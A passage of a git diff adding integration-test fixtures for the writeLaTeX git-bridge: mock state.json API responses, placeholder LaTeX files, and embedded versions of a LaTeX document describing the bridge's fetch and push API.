b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json new file mode 100644 index 0000000..bdbb321 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json @@ -0,0 +1,45 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3871/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "error" + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json new file mode 100644 index 0000000..6203cf5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3875/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json new file mode 100644 index 0000000..69eb0cc --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json @@ -0,0 +1,34 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "test@example.com", + "name": "Test User" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "invalidFiles", + "errors": [ + { + "file": "file1.exe", + "state": "disallowed" + } + ] + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json new file mode 100644 index 0000000..6e3ea9a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json @@ -0,0 +1,29 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "test@example.com", + "name": "Test User" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json new file mode 100644 index 0000000..f273818 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "1234bbccddff", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3884/state/testproj/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..f719efd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +two diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json new file mode 100644 index 0000000..4dcdc51 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json @@ -0,0 +1,39 @@ +[ + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "migratedFromId": "testprojthatdoesnotexist" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "two\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3882/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json new file mode 100644 index 0000000..90fa025 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json @@ -0,0 +1,198 @@ +[ + { + "project": "1826rqgsdb", + "getDoc": { + "versionID": 243, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 243, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + }, + { + "versionID": 185, + "comment": "with more details on POST request", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-11T17:18:40.789Z" + }, + { + "versionID": 175, + "comment": "with updated PUT/POST request", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-09T23:09:13.123Z" + }, + { + "versionID": 146, + "comment": "added PUT format", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-07T15:11:35.456Z" + }, + { + "versionID": 74, + "comment": "with example output", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T18:09:41.789Z" + }, + { + "versionID": 39, + "comment": "with more files", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T18:02:19.123Z" + }, + { + "versionID": 24, + "comment": "first draft", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T17:56:58.456Z" + } + ], + "getForVers": [ + { + "versionID": 243, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. This endpoint returns the latest version id, when the latest version was created (ISO8601), and the user that last edited the project (if any, otherwise null).\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => {\\n \\\"latestVerId\\\": 39,\\n \\\"latestVerAt\\\": \\\"2014-11-30T18:35:27Z\\\",\\n \\\"latestVerBy\\\": {\\n \\\"email\\\": \\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\": \\\"John Lees-Miller\\\"\\n }}\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: [ {\\n file: the file name from the snapshot,\\n state: \\\"error\\\"|\\\"disallowed\\\"|\\\"unclean_name\\\"\\n }, ... ]\\n}\\nIf the file's error state is unclean_name, the error object will alsocontain a property cleanFile that contains the name of the file after it has been \\\"cleaned\\\" to meet our file naming requirements; for other file error states, this property is not present.\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n message: short string message for debugging\\n errors: [ array of zero or more string messages for the user ]\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 185, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: TODO\\n}\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n errors: TODO\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 175, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a 